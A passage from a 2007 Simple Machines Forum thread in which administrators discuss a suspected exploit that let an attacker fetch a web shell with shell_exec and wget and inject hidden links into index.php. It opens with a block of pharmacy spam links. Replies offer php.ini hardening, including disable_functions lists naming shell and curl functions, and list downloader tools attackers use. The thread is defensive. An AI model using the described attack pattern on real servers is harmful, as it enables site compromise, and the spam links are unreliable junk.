 alcohol erectile dysfunction <a href="http://www.telaen.org/forum/Packages/backup/12/index.html">cialis prescription latin</a> online pharmacy no prescription<br>
 retail pharmacy <a href="http://www.telaen.org/forum/Packages/backup/13/index.html">levitra asperin</a> tadalafil overnight<br>
 hospital pharmacy <a href="http://www.telaen.org/forum/Packages/backup/14/index.html">levitra alpha blockers</a> tadalafil in<br>
 erectile dysfunction cures <a href="http://www.telaen.org/forum/Packages/backup/15/index.html">penis enlargement pll ada</a> tadalafil structure<br>
 sildenafil erection <a href="http://www.telaen.org/forum/Packages/backup/16/index.html">enhancement free male</a> tadalafil mexico<br>
 schools of pharmacy <a href="http://www.telaen.org/forum/Packages/backup/17/index.html">penis enlargement pipl hopkinsville</a> sildenafil 50 mg<br>
 counter sildenafil <a href="http://www.telaen.org/forum/Packages/backup/18/index.html">penis enlargement rxercise texas</a> sildenafil drug standard<br>
 for sildenafil citrate <a href="http://www.telaen.org/forum/Packages/backup/19/index.html">the rope male enhancement</a> tadalafil lowest cost<br>
 sildenafil contraindications <a href="http://www.telaen.org/forum/Packages/backup/20/index.html">cheap herball penis enlargement</a> can i buy sildenafil<br>
</font>

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #6 on: September 29, 2007, 03:20:05 PM »
There were a few security fixes in 1.1.4, one of them might be related to your problem. We have been unaware of them being used in the wild, but one of our developers might be able to determine more once they go through the security report.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #7 on: September 29, 2007, 03:32:19 PM »
Lets hope so. The only thing I see relevant under the changelog is this...
Quote
! Some input values didn't get escaped properly - reported by Michael Brooks. (ManageMembergroups.php, PersonalMessages.php, Post.php, Profile.php, QueryString.php, Search.php, Subs-Boards.php, Subs.php)

But its a wild guess at this point, whatever the problem, it looks like it allows an attacker to download a script just from POSTing some data.

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #8 on: September 29, 2007, 03:42:22 PM »
Of course, you should have allow_url_fopen turned off unless there is a specific need for it, then enable only for that script or directory. That will pretty much stop server-side remote inclusion attacks in general.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #9 on: September 29, 2007, 04:00:02 PM »
I'm not up and up on the subject, but from what I understand the issue here is with the attacker being able to call 'wget' or something similar from the shell to download a script. Like 'shell_exec(wget(...))', which gets around allow_url_fopen.
« Last Edit: September 29, 2007, 05:00:14 PM by be_cool »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #10 on: September 29, 2007, 06:08:22 PM »
The attack itself is a mystery since I do not log POST data in any way, but a fix for this is to disable certain PHP functions...

Quote
disable_functions = exec,passthru,shell_exec,system,show_source

This should prevent most scripted attacks, but you still have functions like...
proc_open,popen,curl_exec,ini_alter/set,parse_ini_file

And you can also disable the allow_url_fopen wrapper, just in case...
Quote
allow_url_fopen = Off

You might also want to run http://rkhunter.sourceforge.net/ [nofollow] and get this setup...
http://la-samhna.de/samhain/ [nofollow]
« Last Edit: September 29, 2007, 06:50:37 PM by be_cool »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #11 on: September 30, 2007, 09:45:20 AM »
I've been playing around with queries on google, trying to locate other "Powered by SMF" forums with the spam keywords inserted, and it looks like there is a bunch of them.

Here is a couple.
Code: [Select]
http://omnifind.ibm.yahoo.net/forums/index.php
http://www.liftport.com/forums/
http://forums.questionablecontent.net/
http://www.zerr.org/family/index.php
http://forum.joomlaworks.gr/index.php

[I've put it in code so you guys are not linking to spam sites]

Just look at the source of the page, at the very bottom it will have spam links inserted.
« Last Edit: September 30, 2007, 09:59:27 AM by be_cool »

Offline SlammedDime

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 10,280
  • School of Air Ride
    • matt.zuba on Facebook
    • @mattzuba on Twitter
    • ZubaFitness
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #12 on: September 30, 2007, 12:51:52 PM »
Most, if not all of the 'fetching preview' problems come from people modifying files incorrectly, or breaking javascript by inserting their own for ads or whatever the case may be.
SlammedDime
Former Lead Customizer
BitBucket Projects
GeekStorage.com Hosting
                      My Mods
SimpleSEF
Ajax Quick Reply
Sitemap
more...
                     

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #13 on: September 30, 2007, 02:00:34 PM »
I checked the six SMF forums (4 I admin, 2 I'm a member) that I keep an eye on, and none of them have been affected in this way (despite at least two running an old version for a bit longer than they should have).
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #14 on: September 30, 2007, 03:22:56 PM »
The attacker found me via google query...
Quote
"Powered by SMF 1.1.3" site:net
...a few days after the release of 1.1.4.

So I am thinking that this was fixed with 1.1.4.

I'm also suspecting he/she used shell_exec(wget ...) to d/l the web shell that was used to edit index.php and do other stuff.

I run my SMF forum on a VPS that I administer myself and did not have any PHP functions disabled under php.ini, unlike most hosts that probably do disable the above mentioned functions().

I have not looked into it further, but I'm pretty sure the preview feature was broken by the inserted hidden spam links.

I see now that I was jumping the gun by suggesting that there was a strong correlation between this hack and the problems some users reported.

Though unless this attack is specific to v1.1.3, chances are the previous versions are susceptible to this also that run on a host that do not have the mentioned php functions disabled.

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #15 on: September 30, 2007, 05:01:35 PM »
Though unless this attack is specific to v1.1.3, chances are the previous versions are susceptible to this also that run on a host that do not have the mentioned php functions disabled.

Asa far as I know, we have not looked at all the releases we have put out in the past.

Regardless, there is a reason we emphasize keeping updated so heavily. It is much harder to update to 1.1.4 when you are still on one of the 1.1 RC releases. Likewise for the 1.0 line as well. It might cause a little pain now, but being able to keep up with the latest fixes is much more important, especially with the security fixes added since 1.1 RC3.
« Last Edit: September 30, 2007, 05:08:25 PM by Motoko-chan »
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline SteveWh

  • Semi-Newbie
  • *
  • Posts: 15
  • Gender: Male
    • 25yearsofprogramming.com
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #16 on: October 01, 2007, 02:10:23 AM »
be_cool, thanks for making this report. It gives us all some advance warning.

...a fix for this is to disable certain PHP functions...

Code: [Select]
disable_functions = exec,passthru,shell_exec,system,show_source

This should prevent most scripted attacks, but you still have functions like...
proc_open,popen,curl_exec,ini_alter/set,parse_ini_file

Except for SMF, I use only very basic PHP commands on my site, and so could disable quite a few without breaking anything. I did automated searches of the SMF 1.1.4 code to try to discover which functions could safely be disabled without breaking SMF's functionality. 

Of the functions you mentioned, shell_exec and ini_set appear to be used, so they probably shouldn't be disabled.

I wound up with this tentative line for php.ini. To all the functions you mentioned, I added some more.

disable_functions = exec,passthru,system,show_source,proc_open,proc_close,popen,pclose,curl_exec,parse_ini_file,dl

This is not tested at all as of this moment, and I'm a beginner at PHP (that's a warning about the validity of this fn list). If anyone sees that something in the line will break SMF, please say so.

The webhost I'm at doesn't allow the use of wget. That's one protection.

Anyone who hosts from their own PC could (?) move the wget executable to a directory that isn't in the search path so it can only be run by someone who knows exactly where it is.
« Last Edit: October 01, 2007, 04:12:23 AM by SteveWh »

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #17 on: October 01, 2007, 02:24:24 AM »
Of the functions you mentioned, shell_exec and ini_set appear to be used, so they probably shouldn't be disabled.

I believe we only use shell_exec for DNS lookups. If you disable hostname lookups, you should be okay disabling that function as well. Of course, I haven't studied the code all that closely lately, so there might be something else using it as well.


The webhost I'm at doesn't allow the use of wget. That's one protection.

Anyone who hosts from their own PC could (?) move the wget executable to a directory that isn't in the search path so it can only be run by someone who knows exactly where it is.

Don't forget curl. It is designed to be easier to program, anyway. Heck, libcurl can even be in PHP if enabled (and some hosts enable it as some payment gateways use it). There is also lynx, too. If all else fails, if perl is on the system (it almost always is, many system commands need it) that can be used and there is a bonus if LWP is installed. Note that these are just the ways I thought of off the top of my head. Moving executables is pointless when there are so many ways to get around missing one. The best protection in this case is vigilance.
« Last Edit: October 01, 2007, 02:26:10 AM by Motoko-chan »
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline SteveWh

  • Semi-Newbie
  • *
  • Posts: 15
  • Gender: Male
    • 25yearsofprogramming.com
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #18 on: October 01, 2007, 03:26:46 AM »
I believe we only use shell_exec for DNS lookups. If you disable hostname lookups, you should be okay disabling that function as well. Of course, I haven't studied the code all that closely lately, so there might be something else using it as well.
You're right. I just checked. Only 3 uses of it, all in one function, host_from_ip($ip).

Revised php.ini line. I tested a variation of this. Browsing through forum pages and in the Admin area produced no errors:

disable_functions = exec,shell_exec,passthru,system,show_source,proc_open,popen,parse_ini_file,dl,
curl_errno,curl_error,curl_exec,curl_init,curl_multi_add_handle,curl_multi_exec,curl_multi_init,
curl_multi_select,curl_setopt_array,curl_setopt

I think I've seen an injection attack script that used ftp to retrieve the remote shell script, so the whole slew of ftp_ commands could be added to the list, too. However, ftp_ functions are used extensively by SMF's install.php and the Package Manager, so you'd have to remember to enable them before using those functions.

Basically, you just have to keep attackers out so they can't get to the "import a remote file" stage of the attack. The first "import a remote script" is often done by injection of a URL in a query string, so allow_url_fopen = Off will usually prevent them from getting to the second stage. Also blocking libwww-perl in .htaccess will help, as it is the most common User-Agent used (actually the only one I've seen used so far).

Once they're in, allow_url_fopen = Off won't prevent them from using the ftp_ functions. (I realized that just now: the Package Manager upgrade from 1.1.3 to 1.1.4 a couple days ago was successful even though allow_url_fopen was Off in php.ini.)

Useful security-related php.ini settings:

register_globals = Off
allow_url_fopen = Off
disable_functions = (as above)
display_errors = Off
display_startup_errors = Off
error_log = /home/{user}/{path}/{filename}
error_reporting = E_ALL
expose_php = Off
log_errors = On
« Last Edit: October 01, 2007, 05:05:52 AM by SteveWh »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #19 on: October 01, 2007, 09:47:00 AM »
Quote
-rwxr-xr-x  1 root root 1174840 Nov 11  2005 /usr/bin/lynx
-rwxr-xr-x  1 root root 200392 Nov  2  2005 /usr/bin/wget
-rwxr-xr-x  1 root root 76252 May  2 17:29 /usr/bin/curl
-rwxr-xr-x  2 root root 12548 Aug 12  2006 /usr/bin/perl
-rwxr-xr-x  2 root root 12548 Aug 12  2006 /usr/bin/perl5.8.5

There is also one called 'links', but I think last I saw that was RH7.3.

PHP runs as the apache child process user. So you could just remove the execute bit for everyone else but root:root with chmod 754. But I'm not sure if that could break something like yum, apt-get, etc.

But then you have scp, ftp, and so many other ways to d/l something...
« Last Edit: October 01, 2007, 09:57:04 AM by be_cool »